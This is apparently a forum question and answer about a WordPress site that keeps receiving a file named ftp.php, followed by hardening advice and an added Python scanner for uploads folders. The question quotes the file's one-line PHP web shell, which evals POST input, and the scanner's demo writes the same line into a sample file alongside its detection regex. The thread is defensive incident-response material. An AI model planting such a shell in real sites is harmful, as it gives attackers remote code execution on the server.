WordPress - Hacker leaves ftp.php


It appears as if a couple of my WordPress sites keep getting hacked. I have Wordfence installed, have changed passwords, etc. A file called ftp.php keeps getting uploaded to the “uploads” folder.

It contains this:

<?php echo '123.txt'; ?> <?php @eval($_POST['a']);?>

What do I do? Any idea how to get rid of this? I haven’t experienced any other issues on the blog besides this file.

Just a bit of advice to get you started: if he's had access to your server, you need to do a lot more than patch the original security hole he exploited.

1] You need to determine how he's uploading the file, and prevent him from doing so. If there is a form on your web site that does not validate its data (by using sanitize_key() or equivalent), he could be injecting code that way. Ensure that all user input on your site is being sanitized, and double check everything: plug-ins, your own code, etc.

2] Has he gained access on the server level? Or has he merely gained access to the WordPress back-end? If he's had FTP or similar access to your site, and I mean if he ever hacked in and had it, you need to make sure he has not set up a back-door of some kind. When you've changed your log-ins and he has still managed to re-upload the file, that is indicative of a back-door. If it's not a backdoor, then he's re-using whatever security vulnerability he used to gain access the first time. It's a good idea to check on your server to make sure he hasn't inserted a rogue PHP file somewhere that allows him to re-execute his code. If you have a clean back-up of your server files from before he gained access, wipe the server and re-upload the clean copy. You need to clean up after him in order to stay one step ahead.

3] Determine the vulnerability he's exploiting to gain access to your site. If all of the user input on your site is being sanitized, and you are confident he hasn't set up a backdoor, you need to start logging everything, and checking the logs if/when this happens again. If you cannot prevent him from accessing your server, you need to catch him doing it so you can better understand what he has access to and how he's accessing it. For all you know, this guy could have shell access now, and not be logging in through FTP or WordPress anymore. You need to do your due diligence and figure out where the leaks are. Then patch them.

4] Be realistic and humble. If you find he has infiltrated too far for your experience to handle, talk to your hosting provider and tell them the situation. It's OK to ask them for help; that's what they are there for. Believe me, the last thing they want is a hacker rooting around their precious servers. They have logs of him accessing the server, and may be able to get his IP address. At least, they should be able to assist you in keeping him out if he's accessing your site on the server level.

5] If you manage to get him out, you need to ensure you have plugged the leaks in your WordPress installation. Data needs to be sanitized, ensure there are no rogue files on your server, use as few plugins as possible (they present more opportunities for security holes you don't know about yet), and ensure you have strong passwords that are not easy to brute force. It's a good idea to keep logging so you have something to refer to when things happen. The more difficult you make it for him to access your server, the more likely he is to move on to an easier target. The best offense against hackers is a good defense.

You might find this article from the WordPress Codex informative: http://codex.wordpress.org/hardening_wordpress

6] Back up your files and databases. Now. Once you have taken care of this, it's a good idea to back up everything you have on the server if you haven't already. You need to realize this hacker could have been a complete jerk and deleted everything. Once you know your files are clean and your server is hacker free, back...up...everything. Databases as well. You should be doing this weekly at least, depending on how often you update your site, and store the back-ups on a different server. If you want to be smart, make a third backup on your local machine. The more the merrier, because you do not want to find yourself in a position where you have to start from scratch because a hacker decided to delete all of your files.

Best of luck, and keep us posted if you have any updates. We may be able to give more specific and better advice.
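
The rogue-file check from steps 2 and 5, as an added example that is not part of the original answer: a Python sketch that walks an uploads directory and flags PHP-executable files, PHP tags hidden in other file types, and eval() fed from request input like the ftp.php in the question. The extension list, reason strings and the sample tree in demo() are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions a PHP handler commonly executes (assumed list); uploads should hold media only.
PHP_EXTS = {".php", ".phtml", ".php5", ".phar"}
# eval() fed directly from request input, as in the ftp.php shown in the question.
EVAL_REQ = re.compile(rb"eval\s*\(\s*\$_(post|get|request|cookie)\b", re.I)
PHP_TAG = re.compile(rb"<\?php", re.I)

def scan_uploads(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1024 * 1024)  # only the first 1 MiB is inspected
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTS:
                findings.append((rel, "php-file-in-uploads"))
            elif PHP_TAG.search(data):
                findings.append((rel, "php-tag-in-non-php-file"))
            if EVAL_REQ.search(data):
                findings.append((rel, "eval-of-request-input"))
    return sorted(findings)

def demo():
    """Scan a constructed uploads tree (sample data, not from a real site)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "2015", "06"))
        samples = {
            "ftp.php": b"<?php echo '123.txt'; ?> <?php @eval($_POST['a']);?>",
            "2015/06/photo.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
            "2015/06/logo.png": b"\x89PNG <?php echo 1; ?>",
        }
        for rel, body in samples.items():
            with open(os.path.join(root, *rel.split("/")), "wb") as fh:
                fh.write(body)
        return scan_uploads(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:28} {rel}")
```

Run it against wp-content/uploads on a schedule and compare the output with the previous run; a new finding between runs narrows down when the file was dropped, which tells you which log window to read.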

